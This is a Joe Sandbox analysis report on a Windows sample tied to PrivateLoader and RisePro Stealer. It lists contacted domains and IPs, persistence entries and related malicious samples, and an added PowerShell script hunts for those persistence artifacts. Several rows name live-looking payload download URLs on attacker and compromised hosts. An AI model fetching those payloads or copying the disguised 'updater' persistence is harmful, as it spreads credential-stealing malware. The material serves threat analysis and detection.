| https://easy2buy.ae/wp-content/plugins/qi-blocks/assets/dist/main.js?ver=6.5.3 | file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | false | Avira URL Cloud: malware | unknown |
| https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL | D87fZN3R3jFeplaces.sqlite.0.dr | false | | high |
| https://easy2buy.ae/wp-content/plugins/newhome-core/inc/plugins/elementor/assets/js/elementor.min.js | file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | false | Avira URL Cloud: malware | unknown |
| https://db-ip.com:443/demo/home.php?s=81.181.60.11-Type: | file.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085945219.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086587679.00000000017AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086176899.00000000017B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215228010.00000000017B5000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://easy2buy.ae/investment-tax-and-accounting-advisory/ | EdgeMS2.exe.0.dr | false | Avira URL Cloud: safe | unknown |
| https://easy2buy.ae/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.14.0 | file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | false | Avira URL Cloud: safe | unknown |
| https://easy2buy.ae/wp-content/uploads/elementor/css/post-2951.css?ver=1690457763 | file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | false | Avira URL Cloud: malware | unknown |
| https://easy2buy.ae/wp-json/ | file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | false | Avira URL Cloud: safe | unknown |
| https://www.instagram.com/easy2buydubai/ | file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | false | | high |
| https://easy2buy.ae/comments/feed/ | file.exe, 00000000.00000002.3215883795.0000000006321000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2601798968.0000000006320000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | false | Avira URL Cloud: safe | unknown |
| https://easy2buy.ae/general-guidance-on-living-in-dubai/ | EdgeMS2.exe.0.dr | false | Avira URL Cloud: safe | unknown |
| https://easy2buy.ae/wp-content/upgrade/k.exexe | file.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown |
| http://ocsp.sectigo.com0 | file.exe | false | URL Reputation: safe | unknown |
| https://easy2buy.ae/blog/ | file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | false | Avira URL Cloud: safe | unknown |
| https://schema.org/WPFooter | file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | false | | high |
| https://yoast.com/wordpress/plugins/seo/ | file.exe, 00000000.00000003.2577250291.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.0000000006321000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2601798968.0000000006320000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575692575.00000000017E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | false | | high |
| https://easy2buy.ae/resale-of-the-apartment/ | file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | false | Avira URL Cloud: safe | unknown |
| https://easy2buy.ae/wp-content/plugins/qi-addons-for-elementor/inc/plugins/elementor/assets/js/eleme | file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | false | Avira URL Cloud: malware | unknown |
| https://easy2buy.ae/#organization | EdgeMS2.exe.0.dr | false | Avira URL Cloud: safe | unknown |
| https://easy2buy.ae/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2 | file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | false | Avira URL Cloud: safe | unknown |
| https://easy2buy.ae/wp-content/plugins/newhome-core/inc/maps/assets/js/custom-marker.js?ver=6.5.3 | file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | false | Avira URL Cloud: malware | unknown |
| https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | file.exe, 00000000.00000003.2084200905.0000000006308000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2079811279.0000000006304000.00000004.00000020.00020000.00000000.sdmp, XT01mi44PjK3Web Data.0.dr, 7Uefi7OpyFd1Web Data.0.dr, niRQM4iEj4A_Web Data.0.dr | false | | high |
| https://easy2buy.ae/wp-content/plugins/newhome-core/assets/js/newhome-core.min.js?ver=6.5.3 | file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | false | Avira URL Cloud: malware | unknown |
| https://easy2buy.ae/wp-content/plugins/newhome-core/inc/maps/assets/js/markerclusterer.js?ver=6.5.3 | file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | false | Avira URL Cloud: malware | unknown |
| https://easy2buy.ae/wp-content/plugins/revslider/public/assets/js/rs6.min.js?ver=6.6.13 | file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | false | Avira URL Cloud: malware | unknown |
| https://easy2buy.ae/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.14.0 | file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | false | Avira URL Cloud: malware | unknown |
| https://easy2buy.ae/wp-content/plugins/page-links-to/dist/new-tab.js?ver=3.3.6 | file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | false | Avira URL Cloud: malware | unknown |
| https://easy2buy.ae/wp-content/uploads/elementor/css/custom-widget-icon-box.min.css?ver=1687512247 | file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | false | Avira URL Cloud: malware | unknown |
| https://easy2buy.ae/wp-content/plugins/custom-twitter-feeds/css/ctf-styles.min.css?ver=2.1.1 | file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575678526.0000000006325000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | false | Avira URL Cloud: malware | unknown |
| https://easy2buy.ae/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0 | file.exe, 00000000.00000003.2575663319.000000000632E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575635154.000000000633A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3215883795.00000000062D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2577222935.000000000633A000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, MSIUpdaterV2.exe.0.dr, 5gWGoAS2PcD8cwXXOLQZ.exe.0.dr, EdgeMS2.exe.0.dr | false | Avira URL Cloud: safe | unknown |
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 34.117.186.192 | ipinfo.io | United States | 139070 | GOOGLE-AS-AP Google Asia Pacific Pte Ltd SG | false |
| 193.233.132.175 | unknown | Russian Federation | 2895 | FREE-NET-AS FREEnet EU | false |
| 5.42.96.65 | unknown | Russian Federation | 39493 | RU-KSTV Kolomna Group of companies Guarantee-tv RU | true |
| 172.67.75.166 | db-ip.com | United States | 13335 | CLOUDFLARENET US | false |
| 185.199.220.53 | easy2buy.ae | United Kingdom | 12488 | KRYSTAL GR | false |
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1440169
Start date and time: 2024-05-12 12:30:08 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 12s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@8/30@3/5
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 54%
• Number of executed functions: 50
• Number of non-executed functions: 26
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
| Time | Type | Description |
|---|---|---|
| 12:31:52 | Task Scheduler | Run new task: MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c HR path: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe |
| 12:31:52 | Task Scheduler | Run new task: MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c LG path: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe |
| 12:31:52 | API Interceptor | 66x Sleep call for process: file.exe modified |
| 12:31:54 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe |
| 12:32:02 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe |
| 12:32:10 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk |
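The timeline above records three persistence mechanisms set up by the sample: two scheduled tasks named MSIUpdaterV2_<hash> under C:\ProgramData, an HKCU Run value named AdobeUpdaterV2_<hash> under %LOCALAPPDATA%, and an EdgeMS2.lnk shortcut in the user's Startup folder. The following PowerShell is an added host-side check for those artifacts, written here as an example; it is not part of the Joe Sandbox report and not the sandbox's own tooling. The task, value and shortcut names are taken from the timeline; the `[0-9a-f]{32}` pattern is an assumption that generalises the single 32-hex-character suffix seen in this run; the SHA-256 is the submitted sample's, and the dropped copies are separate files that need not share it.

```powershell
# Added example (not from the report): hunt for the persistence artifacts the
# timeline lists. Run in PowerShell on a host suspected of having run file.exe.
# Assumption: the 32-hex-character suffix varies per victim, hence the regex.

$Findings = @()

# 1. Scheduled tasks MSIUpdaterV2_<hash> (report shows two, "HR" and "LG",
#    both launching C:\ProgramData\MSIUpdaterV2_<hash>\MSIUpdaterV2.exe).
Get-ScheduledTask -ErrorAction SilentlyContinue |
    Where-Object { $_.TaskName -match '^MSIUpdaterV2_[0-9a-f]{32}' } |
    ForEach-Object {
        $action = ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)".Trim() }) -join '; '
        $Findings += [pscustomobject]@{ Type = 'ScheduledTask'; Name = $_.TaskName; Path = $action }
    }

# 2. HKCU Run value AdobeUpdaterV2_<hash>. The report logs it under both HKCU and
#    HKCU64, but this key is not WOW64-redirected, so one query covers both views.
$runKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
if (Test-Path $runKey) {
    $values = Get-ItemProperty -Path $runKey
    (Get-Item $runKey).GetValueNames() |
        Where-Object { $_ -match '^AdobeUpdaterV2_[0-9a-f]{32}$' } |
        ForEach-Object {
            $Findings += [pscustomobject]@{ Type = 'RunKey'; Name = $_; Path = $values.$_ }
        }
}

# 3. Startup-folder shortcut EdgeMS2.lnk; resolve its target via WScript.Shell.
$startup = [Environment]::GetFolderPath('Startup')
Get-ChildItem -Path $startup -Filter 'EdgeMS2.lnk' -ErrorAction SilentlyContinue |
    ForEach-Object {
        $shell  = New-Object -ComObject WScript.Shell
        $target = $shell.CreateShortcut($_.FullName).TargetPath
        $Findings += [pscustomobject]@{ Type = 'StartupLnk'; Name = $_.Name; Path = $target }
    }

# 4. Hash whatever the artifacts point at and compare with the submitted sample.
#    A match confirms the report's sample; a mismatch does not clear the host,
#    because PrivateLoader drops distinct payload files.
$sampleSha256 = 'D8E3A7E5DF4C2591B40D2AF7A224C6E5CB18E11D27CBFDBFDDA4E02DB33C849E'
foreach ($f in $Findings) {
    # Take the first .exe path in the action string, ignoring any arguments.
    if ($f.Path -match '^"?([^"]+?\.exe)') {
        $exe = $Matches[1]
        if (Test-Path -LiteralPath $exe) {
            $hash = (Get-FileHash -Algorithm SHA256 -LiteralPath $exe).Hash
            $f | Add-Member -NotePropertyName SHA256        -NotePropertyValue $hash
            $f | Add-Member -NotePropertyName MatchesSample -NotePropertyValue ($hash -eq $sampleSha256)
        } else {
            $f | Add-Member -NotePropertyName SHA256 -NotePropertyValue 'target missing'
        }
    }
}

if ($Findings.Count -eq 0) { 'No MSIUpdaterV2 / AdobeUpdaterV2 / EdgeMS2 persistence found.' }
else { $Findings | Format-Table -AutoSize }
```

The script only reports; removal of the task, Run value and shortcut is left to the responder once the hashes and targets have been preserved as evidence. Because the Run value is under HKCU, the check has to run in the context of each user profile on a shared machine, or be repeated against each loaded user hive.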
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 34.117.186.192 | SecuriteInfo.com.Win32.Evo-gen.24318.16217.exe | malicious | Unknown | ipinfo.io/json |
| | SecuriteInfo.com.Win32.Evo-gen.28489.31883.exe | malicious | Unknown | ipinfo.io/json |
| | Raptor.HardwareService.Setup 1.msi | malicious | Unknown | ipinfo.io/ip |
| | Conferma_Pdf_Editor.exe | malicious | Planet Stealer | ipinfo.io/ |
| | Conferma_Pdf_Editor.exe | malicious | Planet Stealer | ipinfo.io/ |
| | w.sh | malicious | Xmrig | /ip |
| | Raptor.HardwareService.Setup_2.3.6.0.msi | malicious | Unknown | ipinfo.io/ip |
| | Raptor.HardwareService.Setup_2.3.6.0.msi | malicious | Unknown | ipinfo.io/ip |
| | uUsgzQ3DoW.exe | malicious | RedLine | ipinfo.io/ip |
| | 8BZBgbeCcz.exe | malicious | RedLine | ipinfo.io/ip |
| 193.233.132.175 | file.exe | malicious | Clipboard Hijacker, RisePro Stealer | 193.233.132.175/server/k/l2.exe |
| | file.exe | malicious | Clipboard Hijacker, RisePro Stealer | 193.233.132.175/server/k/l2.exe |
| | file.exe | malicious | Clipboard Hijacker, RisePro Stealer | 193.233.132.175/server/k/l2.exe |
| | file.exe | malicious | Clipboard Hijacker, RisePro Stealer | 193.233.132.175/server/k/l2.exe |
| | file.exe | malicious | Clipboard Hijacker, RisePro Stealer | 193.233.132.175/server/k/l2.exe |
| | file.exe | malicious | Clipboard Hijacker, RisePro Stealer | 193.233.132.175/server/k/l2.exe |
| | file.exe | malicious | Clipboard Hijacker, RisePro Stealer | 193.233.132.175/server/k/l2.exe |
| | file.exe | malicious | Clipboard Hijacker, RisePro Stealer | 193.233.132.175/server/k/l2.exe |
| | file.exe | malicious | Clipboard Hijacker, RisePro Stealer | 193.233.132.175/server/k/l2.exe |
                                                                        file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                        • 193.233.132.175/server/k/l2.exe
Associated Sample Name / URL | Detection | Threat Name | Context (rows grouped by Match)

Match: ipinfo.io
file.exe | malicious | PrivateLoader, RisePro Stealer | 34.117.186.192
vMVtHAaYPS.exe | malicious | PrivateLoader, RisePro Stealer | 34.117.186.192
DKYxuyu8p1.exe | malicious | PrivateLoader, RisePro Stealer | 34.117.186.192
file.exe | malicious | PrivateLoader, RisePro Stealer | 34.117.186.192
Z1AFrCk6zF.exe | malicious | PrivateLoader, RisePro Stealer | 34.117.186.192
file.exe | malicious | PrivateLoader, RisePro Stealer | 34.117.186.192
Tool-Scan-Proxy.doc | malicious | Abobus Obfuscator, Braodo | 34.117.186.192
file.exe | malicious | PrivateLoader, RisePro Stealer | 34.117.186.192
file.exe | malicious | PrivateLoader, RisePro Stealer | 34.117.186.192
7Tat3LP3VY.msi | malicious | Unknown | 34.117.186.192

Match: easy2buy.ae
file.exe | malicious | PrivateLoader, RisePro Stealer | 185.199.220.53
file.exe | malicious | Clipboard Hijacker, RisePro Stealer | 185.199.220.53
file.exe | malicious | Clipboard Hijacker, RisePro Stealer | 185.199.220.53
file.exe | malicious | Clipboard Hijacker, RisePro Stealer | 185.199.220.53
file.exe | malicious | Clipboard Hijacker, RisePro Stealer | 185.199.220.53
file.exe | malicious | Clipboard Hijacker, RisePro Stealer | 185.199.220.53
file.exe | malicious | Clipboard Hijacker, RisePro Stealer | 185.199.220.53
file.exe | malicious | Clipboard Hijacker, RisePro Stealer | 185.199.220.53
file.exe | malicious | Clipboard Hijacker, RisePro Stealer | 185.199.220.53
file.exe | malicious | Clipboard Hijacker, RisePro Stealer | 185.199.220.53

Match: db-ip.com
file.exe | malicious | PrivateLoader, RisePro Stealer | 104.26.5.15
vMVtHAaYPS.exe | malicious | PrivateLoader, RisePro Stealer | 104.26.4.15
DKYxuyu8p1.exe | malicious | PrivateLoader, RisePro Stealer | 172.67.75.166
file.exe | malicious | PrivateLoader, RisePro Stealer | 104.26.5.15
Z1AFrCk6zF.exe | malicious | PrivateLoader, RisePro Stealer | 104.26.5.15
file.exe | malicious | PrivateLoader, RisePro Stealer | 172.67.75.166
file.exe | malicious | PrivateLoader, RisePro Stealer | 104.26.4.15
file.exe | malicious | PrivateLoader, RisePro Stealer | 104.26.5.15
mrH7nYSmPU.exe | malicious | PrivateLoader, RisePro Stealer | 104.26.5.15
mrH7nYSmPU.exe | malicious | PrivateLoader, RisePro Stealer | 104.26.5.15
Associated Sample Name / URL | Detection | Threat Name | Context (rows grouped by Match)

Match: GOOGLE-AS-APGoogleAsiaPacificPteLtdSG
file.exe | malicious | PrivateLoader, RisePro Stealer | 34.117.186.192
vMVtHAaYPS.exe | malicious | PrivateLoader, RisePro Stealer | 34.117.186.192
DKYxuyu8p1.exe | malicious | PrivateLoader, RisePro Stealer | 34.117.186.192
file.exe | malicious | PrivateLoader, RisePro Stealer | 34.117.186.192
Z1AFrCk6zF.exe | malicious | PrivateLoader, RisePro Stealer | 34.117.186.192
file.exe | malicious | PrivateLoader, RisePro Stealer | 34.117.186.192
Tool-Scan-Proxy.doc | malicious | Abobus Obfuscator, Braodo | 34.117.186.192
file.exe | malicious | PrivateLoader, RisePro Stealer | 34.117.186.192
file.exe | malicious | PrivateLoader, RisePro Stealer | 34.117.186.192
7Tat3LP3VY.msi | malicious | Unknown | 34.117.186.192

Match: RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU
SecuriteInfo.com.Win32.Evo-gen.7599.4638.exe | malicious | Amadey | 5.42.96.7
SecuriteInfo.com.Win32.Evo-gen.1259.29948.exe | malicious | Amadey | 5.42.96.7
v2Ph1uKcXr.exe | malicious | Amadey | 5.42.96.7
yGn9saDnXX.exe | malicious | LummaC, Amadey, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc | 5.42.96.78
file.exe | malicious | RedLine | 5.42.65.77
file.exe | malicious | RedLine | 5.42.65.77
http://5.42.66.10/download/123p.exe | malicious | Xmrig | 5.42.66.10
mrH7nYSmPU.exe | malicious | PrivateLoader, RisePro Stealer | 5.42.96.55
mrH7nYSmPU.exe | malicious | PrivateLoader, RisePro Stealer | 5.42.96.55
file.exe | malicious | RedLine | 5.42.65.77

Match: CLOUDFLARENETUS
myfile.exe | malicious | LummaC | 104.21.24.227
file.exe | malicious | PrivateLoader, RisePro Stealer | 104.26.5.15
file.exe | malicious | LummaC | 104.21.21.15
vMVtHAaYPS.exe | malicious | PrivateLoader, RisePro Stealer | 104.26.4.15
jew.arm7.elf | malicious | Mirai | 104.27.68.51
DKYxuyu8p1.exe | malicious | PrivateLoader, RisePro Stealer | 172.67.75.166
tvD0ERAvEn.exe | malicious | LummaC | 172.67.162.147
yGn9saDnXX.exe | malicious | LummaC, Amadey, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc | 104.21.39.216
file.exe | malicious | PrivateLoader, RisePro Stealer | 104.26.5.15
SecuriteInfo.com.Win32.Evo-gen.10308.24400.exe | malicious | LummaC | 172.67.185.32

Match: FREE-NET-ASFREEnetEU
file.exe | malicious | PrivateLoader, RisePro Stealer | 147.45.47.126
vMVtHAaYPS.exe | malicious | PrivateLoader, RisePro Stealer | 147.45.47.126
DKYxuyu8p1.exe | malicious | PrivateLoader, RisePro Stealer | 147.45.47.126
Z1AFrCk6zF.exe | malicious | PrivateLoader, RisePro Stealer | 147.45.47.126
file.exe | malicious | PrivateLoader, RisePro Stealer | 147.45.47.126
http://147.45.47.102:57893/hera/amadka.exe | malicious | Amadey | 147.45.47.102
http://193.233.132.167/cost/go.exe | malicious | Unknown | 193.233.132.167
mQC9xlWFZV.exe | malicious | PureLog Stealer | 147.45.77.238
mQC9xlWFZV.exe | malicious | PureLog Stealer | 147.45.77.238
file.exe | malicious | PrivateLoader, RisePro Stealer | 147.45.47.126
Associated Sample Name / URL | Detection | Threat Name | Context (rows grouped by Match)

Match: a0e9f5d64349fb13191bc781f81f42e1
myfile.exe | malicious | LummaC | 34.117.186.192, 172.67.75.166
file.exe | malicious | PrivateLoader, RisePro Stealer | 34.117.186.192, 172.67.75.166
file.exe | malicious | LummaC | 34.117.186.192, 172.67.75.166
ThongBao.docm | malicious | Unknown | 34.117.186.192, 172.67.75.166
vMVtHAaYPS.exe | malicious | PrivateLoader, RisePro Stealer | 34.117.186.192, 172.67.75.166
DKYxuyu8p1.exe | malicious | PrivateLoader, RisePro Stealer | 34.117.186.192, 172.67.75.166
